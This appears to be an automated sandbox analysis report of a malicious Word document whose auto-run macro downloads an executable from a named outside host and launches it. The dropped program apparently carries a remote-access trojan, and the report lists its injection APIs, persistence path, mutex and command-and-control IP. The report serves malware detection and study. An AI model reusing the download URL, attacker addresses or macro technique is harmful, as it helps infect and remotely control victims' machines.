Source: unknown	TCP traffic detected without corresponding DNS query: 87.120.120.27
Source: unknown	TCP traffic detected without corresponding DNS query: 87.120.120.27
Source: unknown	TCP traffic detected without corresponding DNS query: 87.120.120.27
Source: unknown	TCP traffic detected without corresponding DNS query: 87.120.120.27
Source: unknown	TCP traffic detected without corresponding DNS query: 87.120.120.27
Source: unknown	TCP traffic detected without corresponding DNS query: 87.120.120.27
Source: unknown	TCP traffic detected without corresponding DNS query: 87.120.120.27
Source: unknown	TCP traffic detected without corresponding DNS query: 87.120.120.27
Source: unknown	TCP traffic detected without corresponding DNS query: 87.120.120.27
Source: unknown	TCP traffic detected without corresponding DNS query: 87.120.120.27
Source: unknown	TCP traffic detected without corresponding DNS query: 87.120.120.27
Source: unknown	TCP traffic detected without corresponding DNS query: 87.120.120.27
Source: unknown	TCP traffic detected without corresponding DNS query: 87.120.120.27
Source: unknown	TCP traffic detected without corresponding DNS query: 87.120.120.27
Source: unknown	TCP traffic detected without corresponding DNS query: 87.120.120.27
Source: unknown	TCP traffic detected without corresponding DNS query: 87.120.120.27
Source: unknown	TCP traffic detected without corresponding DNS query: 87.120.120.27
Source: unknown	TCP traffic detected without corresponding DNS query: 87.120.120.27

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{79847720-215F-4E11-8E77-239CB6350007}.tmp

Jump to behavior

Source: global traffic

DNS traffic detected: DNS query: www.stipamana.com

Source: unknown	Network traffic detected: HTTP traffic on port 49161 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49161

Source: unknown

HTTPS traffic detected: 87.121.86.205:443 -> 192.168.2.22:49161 version: TLS 1.2

System Summary

Document contains an embedded VBA macro with suspicious strings

Source: yIla7SeJ6r.doc	OLE, VBA macro line: Set WshShell = CreateObject("WScript.Shell")
Source: VBA code instrumentation	OLE, VBA macro: Module ThisDocument, Function Document_Open, String wscript: Set WshShell = CreateObject("WScript.Shell")			Name: Document_Open

Document contains an embedded VBA with functions possibly related to ADO stream file operations

Source: yIla7SeJ6r.doc	Stream path 'Macros/VBA/ThisDocument' : found possibly 'ADODB.Stream' functions open, savetofile, write
Source: VBA code instrumentation	OLE, VBA macro: Module ThisDocument, Function Document_Open, API IXMLHTTPRequest.Open("get","https://www.stipamana.com/sedtryerytsrtyuerthreytwsytysrerter/zgdargaregwaerwgsergtseggs/dfghsgthwstrsrthtghtgh/brtyhdrh.exe",False)	Name: Document_Open
Source: VBA code instrumentation	OLE, VBA macro: Module ThisDocument, Function Document_Open, API Stream.Open()	Name: Document_Open
Source: VBA code instrumentation	OLE, VBA macro: Module ThisDocument, Function Document_Open, API Stream.Write(?\xfffd\x03\x00\x04\x00?\x00\xfffd\x00\x00\x00@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00?\x00????????????????4???????????$\x00\x00\x00?\x00O\x03??\x00\x00\x00\x00\xfffdAc\x0b?\x02?\x00\x00\x00?\x02 \x00?\x02\x00@ \x00?\x00\x04\x00\x00\x00\x04\x00\x00\x00?\x02?\x00\x00\x00\x02?\x00\x10?\x00\x00\x10?\x00\x00\x00\x10\x00\x00\x00\x00\x00?\x02S\x00?\x02?\x00\x00\x00\x00\x00\x00\x00\x00\x00?\x02\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 \x00\x08\x00\x00\x00\x00\x00?\x00H\x00\x00\x00\x00\x00??t\x00?\x02 \x00?\x02?\x00\x00\x00\x00\x00\x00\x00 ???c\x00?\x00?\x02?\x00?\x02\x00\x00\x00\x00\x00\x00@????\x00\x0c\x00?\x02?\x00?\x02\x00\x00\x00\x00\x00\x00@?\x00\x00\x00\x00\x00\x00\x00\x00?\x02\x00\x00H\x00\x02\x05?\x02?\x00\x03\x00\x02?\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00??????????????????????????????????????????????????????????????o????????????????????????????????????????????????????????R????????????????????????????????????????????????????E???????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????\xfffd???????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????j??????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????Z??J????????????????????????????????????????j???????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????\xfffd????????????????????\xfffd?????????????????????????????????????????????\xfffd?????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????U?????????????????????????g????????e??????????????????\xfffd?????????????????????\|?????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????j???????????????????????????????????????????????r?????%??????????????????????\x11?????????????????????????????!???????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????\xfffd?+????????????????????????????????????????\xfffd?\xfffd????\xfffd?????????????	Name: Document_Open
Source: VBA code instrumentation	OLE, VBA macro: Module ThisDocument, Function Document_Open, API IShellDispatch6.Open("C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe")	Name: Document_Open
Source: VBA code instrumentation	OLE, VBA macro: Module ThisDocument, Function Document_Open, found possibly 'ADODB.Stream' functions open, savetofile, write	Name: Document_Open
Source: ~WRD0000.tmp.0.dr	Stream path 'Macros/VBA/ThisDocument' : found possibly 'ADODB.Stream' functions open, savetofile, write

Document contains an embedded VBA with functions possibly related to HTTP operations

Source: yIla7SeJ6r.doc	Stream path 'Macros/VBA/ThisDocument' : found possibly 'XMLHttpRequest' functions response, responsebody, status, open, send
Source: VBA code instrumentation	OLE, VBA macro: Module ThisDocument, Function Document_Open, found possibly 'XMLHttpRequest' functions response, responsebody, status, open, send	Name: Document_Open
Source: ~WRD0000.tmp.0.dr	Stream path 'Macros/VBA/ThisDocument' : found possibly 'XMLHttpRequest' functions response, responsebody, status, open, send

Document contains an embedded VBA with hexadecimal encoded strings

Source: yIla7SeJ6r.doc	Stream path 'Macros/VBA/ThisDocument' : found hex strings
Source: VBA code instrumentation	OLE, VBA macro: Module ThisDocument, Function pSxhdRmdThrZZNzbxJXFWIMnbXRkhEZyEAMPezBKUPtIbvOIyennmrcUcGTSjmphFUNxgiCfkxHdqePrNMoVnYd, String ?!@#$%^&*()_+\|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xbf\xa1\xb2\xb3\xc0\xc1\xc2\xc3\xc4\xc5\xd2\xd3\xd4\xd5\xd6\xd9\xdb\xdc\xe0\xe1\xe2\xe3\xe4\xe5\xd8\xb6\xa7\xda\xa5
Source: ~WRD0000.tmp.0.dr	Stream path 'Macros/VBA/ThisDocument' : found hex strings

Office process drops PE file

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\brtyhdrh[1].exe			Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe			Jump to dropped file

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Memory allocated: 770B0000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Memory allocated: 770B0000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Memory allocated: 770B0000 page execute and read and write

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Code function: 4_2_002EC458 NtResumeThread,	4_2_002EC458
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Code function: 4_2_002EC678 NtWriteVirtualMemory,	4_2_002EC678
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Code function: 4_2_002EC328 NtReadVirtualMemory,	4_2_002EC328
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Code function: 4_2_002EC7D0 NtSetContextThread,	4_2_002EC7D0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Code function: 4_2_002EC451 NtResumeThread,	4_2_002EC451
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Code function: 4_2_002EC670 NtWriteVirtualMemory,	4_2_002EC670
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Code function: 4_2_002EC320 NtReadVirtualMemory,	4_2_002EC320
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Code function: 4_2_002EC7C8 NtSetContextThread,	4_2_002EC7C8
Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe	Code function: 8_2_0030C458 NtResumeThread,	8_2_0030C458
Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe	Code function: 8_2_0030C678 NtWriteVirtualMemory,	8_2_0030C678
Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe	Code function: 8_2_0030C328 NtReadVirtualMemory,	8_2_0030C328
Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe	Code function: 8_2_0030C7D0 NtSetContextThread,	8_2_0030C7D0
Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe	Code function: 8_2_0030C451 NtResumeThread,	8_2_0030C451
Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe	Code function: 8_2_0030C670 NtWriteVirtualMemory,	8_2_0030C670
Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe	Code function: 8_2_0030C320 NtReadVirtualMemory,	8_2_0030C320
Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe	Code function: 8_2_0030C7C8 NtSetContextThread,	8_2_0030C7C8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Code function: 17_2_001DC458 NtResumeThread,	17_2_001DC458
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Code function: 17_2_001DC678 NtWriteVirtualMemory,	17_2_001DC678
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Code function: 17_2_001DC328 NtReadVirtualMemory,	17_2_001DC328
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Code function: 17_2_001DC7D0 NtSetContextThread,	17_2_001DC7D0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Code function: 17_2_001DC451 NtResumeThread,	17_2_001DC451
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Code function: 17_2_001DC670 NtWriteVirtualMemory,	17_2_001DC670
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Code function: 17_2_001DC320 NtReadVirtualMemory,	17_2_001DC320
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Code function: 17_2_001DC7C8 NtSetContextThread,	17_2_001DC7C8

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Code function: 4_2_002EA42A	4_2_002EA42A
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Code function: 4_2_002E0868	4_2_002E0868
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Code function: 4_2_002EB870	4_2_002EB870
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Code function: 4_2_002E38F8	4_2_002E38F8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Code function: 4_2_002E50C9	4_2_002E50C9
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Code function: 4_2_002EC921	4_2_002EC921
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Code function: 4_2_002ED6BA	4_2_002ED6BA
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Code function: 4_2_002E82E2	4_2_002E82E2
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Code function: 4_2_002E6F88	4_2_002E6F88
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Code function: 4_2_002E1B90	4_2_002E1B90
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Code function: 4_2_002E38E7	4_2_002E38E7
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Code function: 4_2_002EA120	4_2_002EA120
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Code function: 4_2_002EA110	4_2_002EA110
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Code function: 5_2_002D0B60	5_2_002D0B60
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Code function: 6_2_00302030	6_2_00302030
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Code function: 6_2_00304458	6_2_00304458
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Code function: 6_2_0030CDC8	6_2_0030CDC8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Code function: 6_2_0030E208	6_2_0030E208
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Code function: 6_2_00303258	6_2_00303258
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Code function: 6_2_0030F6D8	6_2_0030F6D8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Code function: 6_2_00306371	6_2_00306371
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Code function: 6_2_00300B60	6_2_00300B60
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Code function: 6_2_0030EBA8	6_2_0030EBA8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Code function: 6_2_00307F90	6_2_00307F90
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Code function: 6_2_0030BF98	6_2_0030BF98
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Code function: 6_2_0030E1F8	6_2_0030E1F8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Code function: 6_2_0030E1C0	6_2_0030E1C0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Code function: 6_2_0030BA48	6_2_0030BA48
Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe	Code function: 8_2_0030A42A	8_2_0030A42A
Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe	Code function: 8_2_0030B870	8_2_0030B870
Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe	Code function: 8_2_00300868	8_2_00300868
Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe	Code function: 8_2_003038F8	8_2_003038F8
Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe	Code function: 8_2_003050C9	8_2_003050C9
Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe	Code function: 8_2_0030C921	8_2_0030C921
Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe	Code function: 8_2_0030D6B2	8_2_0030D6B2
Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe	Code function: 8_2_003082E2	8_2_003082E2
Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe	Code function: 8_2_00301B90	8_2_00301B90
Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe	Code function: 8_2_00306F8A	8_2_00306F8A
Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe	Code function: 8_2_003038E7	8_2_003038E7
Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe	Code function: 8_2_0030A120	8_2_0030A120
Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe	Code function: 8_2_0030A110	8_2_0030A110
Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe	Code function: 9_2_00300B60	9_2_00300B60
Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe	Code function: 11_2_001C0B60	11_2_001C0B60
Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe	Code function: 12_2_00360B60	12_2_00360B60
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Code function: 17_2_001DA42A	17_2_001DA42A
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Code function: 17_2_001DB870	17_2_001DB870
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Code function: 17_2_001D0868	17_2_001D0868
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Code function: 17_2_001D50C9	17_2_001D50C9
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Code function: 17_2_001D38F8	17_2_001D38F8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Code function: 17_2_001DC921	17_2_001DC921
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Code function: 17_2_001DAA82	17_2_001DAA82
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Code function: 17_2_001DD6BA	17_2_001DD6BA
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Code function: 17_2_001D82E2	17_2_001D82E2
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Code function: 17_2_001D1B90	17_2_001D1B90
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Code function: 17_2_001D6F88	17_2_001D6F88
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Code function: 17_2_001D38E7	17_2_001D38E7
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Code function: 17_2_001DA110	17_2_001DA110
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Code function: 17_2_001DA120	17_2_001DA120
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Code function: 17_2_001DABBA	17_2_001DABBA
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Code function: 17_2_001DABD1	17_2_001DABD1
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Code function: 18_2_001C0B60	18_2_001C0B60
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Code function: 19_2_001C0B60	19_2_001C0B60
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Code function: 20_2_001C0B60	20_2_001C0B60

Source: yIla7SeJ6r.doc	OLE, VBA macro line: Private Sub Document_Open()
Source: VBA code instrumentation	OLE, VBA macro: Module ThisDocument, Function Document_Open	Name: Document_Open
Source: ~WRD0000.tmp.0.dr	OLE, VBA macro line: Private Function JbxHook_Open_0__ob(jbxline, ByRef jbxthis)
Source: ~WRD0000.tmp.0.dr	OLE, VBA macro line: Static jbxtresh_Open as Integer
Source: ~WRD0000.tmp.0.dr	OLE, VBA macro line: If jbxtresh_Open < 200 Then
Source: ~WRD0000.tmp.0.dr	OLE, VBA macro line: JbxHook_Open_0__ob = jbxthis.Open
Source: ~WRD0000.tmp.0.dr	OLE, VBA macro line: If jbxtresh_Open < 200 Then
Source: ~WRD0000.tmp.0.dr	OLE, VBA macro line: jbxtresh_Open = jbxtresh_Open + 1
Source: ~WRD0000.tmp.0.dr	OLE, VBA macro line: JbxLogParam "jbxreturn", JbxHook_Open_0__ob
Source: ~WRD0000.tmp.0.dr	OLE, VBA macro line: Private Function JbxHook_Open_1__ob(jbxline, ByRef jbxthis, ByRef jbxparam0)
Source: ~WRD0000.tmp.0.dr	OLE, VBA macro line: Static jbxtresh_Open as Integer
Source: ~WRD0000.tmp.0.dr	OLE, VBA macro line: If jbxtresh_Open < 200 Then
Source: ~WRD0000.tmp.0.dr	OLE, VBA macro line: JbxHook_Open_1__ob = jbxthis.Open(jbxparam0)
Source: ~WRD0000.tmp.0.dr	OLE, VBA macro line: If jbxtresh_Open < 200 Then
Source: ~WRD0000.tmp.0.dr	OLE, VBA macro line: jbxtresh_Open = jbxtresh_Open + 1
Source: ~WRD0000.tmp.0.dr	OLE, VBA macro line: JbxLogParam "jbxreturn", JbxHook_Open_1__ob
Source: ~WRD0000.tmp.0.dr	OLE, VBA macro line: Private Function JbxHook_Open_3__ob(jbxline, ByRef jbxthis, ByRef jbxparam0, ByRef jbxparam1, ByRef jbxparam2)
Source: ~WRD0000.tmp.0.dr	OLE, VBA macro line: Static jbxtresh_Open as Integer
Source: ~WRD0000.tmp.0.dr	OLE, VBA macro line: If jbxtresh_Open < 200 Then
Source: ~WRD0000.tmp.0.dr	OLE, VBA macro line: JbxHook_Open_3__ob = jbxthis.Open(jbxparam0, jbxparam1, jbxparam2)
Source: ~WRD0000.tmp.0.dr	OLE, VBA macro line: If jbxtresh_Open < 200 Then
Source: ~WRD0000.tmp.0.dr	OLE, VBA macro line: jbxtresh_Open = jbxtresh_Open + 1
Source: ~WRD0000.tmp.0.dr	OLE, VBA macro line: JbxLogParam "jbxreturn", JbxHook_Open_3__ob
Source: ~WRD0000.tmp.0.dr	OLE, VBA macro line: Private Sub Document_Open()
Source: ~WRD0000.tmp.0.dr	OLE, VBA macro line: JbxHook_Open_3__ob 60, lgJLrLRZOuDECHflsWkjzDFxWleOwySvANKtGggHPdEYDctTuFzRAXHRXTgwLSUeBwZcIOiqfKGGFJvBJZ, "get", pSxhdRmdThrZZNzbxJXFWIMnbXRkhEZyEAMPezBKUPtIbvOIyennmrcUcGTSjmphFUNxgiCfkxHdqePrNMoVnYd("h://www.m.m/dhw/zgdggwwgggg/dghghwhghgh/bhdh."), False
Source: ~WRD0000.tmp.0.dr	OLE, VBA macro line: JbxHook_Open_0__ob 65, TsKVKHBTQoXiokwMNjluRzcsYfyGvbWWVbLELqQCSVYQpSxhdRmdThrZZNzbxJXFWIMnbXRkhEZyEAMPezBKUPtIbvOIyennmr
Source: ~WRD0000.tmp.0.dr	OLE, VBA macro line: JbxHook_Open_1__ob 71, xHdqePrNMoVnYdDepjByUqPHDOgvQDNlgJLrLRZOuDECHflsWkjzDFxWleOwySvANKtGggHPdEYDctTuFzRAXHRXTg, (zDFxWleOwySvANKtGggHPdEYDctTuFzRAXHRXTgwLSUeBwZcIOiqfKGGFJvBJZAzPFIAYChfMBVLCQbJJwxXhtUpTsKVKHBT)

Source: yIla7SeJ6r.doc	OLE indicator, VBA macros: true
Source: ~WRD0000.tmp.0.dr	OLE indicator, VBA macros: true

Source: ~WRF{7D8270C0-44E1-49AB-A84D-3D6A12FBB8A9}.tmp.0.dr

OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\brtyhdrh[1].exe 21B7B8656A008AD3E5DF1725CDDF55E650812C1F3D59609F14C0D3089A886DE6
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe 21B7B8656A008AD3E5DF1725CDDF55E650812C1F3D59609F14C0D3089A886DE6
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe 21B7B8656A008AD3E5DF1725CDDF55E650812C1F3D59609F14C0D3089A886DE6

Source: brtyhdrh[1].exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: MDEODF.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: MDEODF.exe.5.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 4.2.MDEODF.exe.600000.2.raw.unpack, -----------------------------------------.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 4.2.MDEODF.exe.201a318.4.raw.unpack, Encryption.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 8.2.MDEODF.exe.2419b5c.1.raw.unpack, Encryption.cs	Cryptographic APIs: 'CreateDecryptor'

Source: classification engine

Classification label: mal100.troj.expl.evad.winDOC@28/17@1/2

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\Desktop\~$la7SeJ6r.doc

Jump to behavior

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Mutant created: NULL
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Mutant created: \Sessions\1\BaseNamedObjects\Xeno_rat_nd8912d-admin

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\CVR862F.tmp

Jump to behavior

Source: yIla7SeJ6r.doc	OLE indicator, Word Document stream: true
Source: ~WRD0000.tmp.0.dr	OLE indicator, Word Document stream: true

Source: yIla7SeJ6r.doc	OLE document summary: title field not present or empty
Source: ~WRD0000.tmp.0.dr	OLE document summary: title field not present or empty
Source: ~WRF{7D8270C0-44E1-49AB-A84D-3D6A12FBB8A9}.tmp.0.dr	OLE document summary: title field not present or empty
Source: ~WRF{7D8270C0-44E1-49AB-A84D-3D6A12FBB8A9}.tmp.0.dr	OLE document summary: author field not present or empty
Source: ~WRF{7D8270C0-44E1-49AB-A84D-3D6A12FBB8A9}.tmp.0.dr	OLE document summary: edited time not present or 0

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
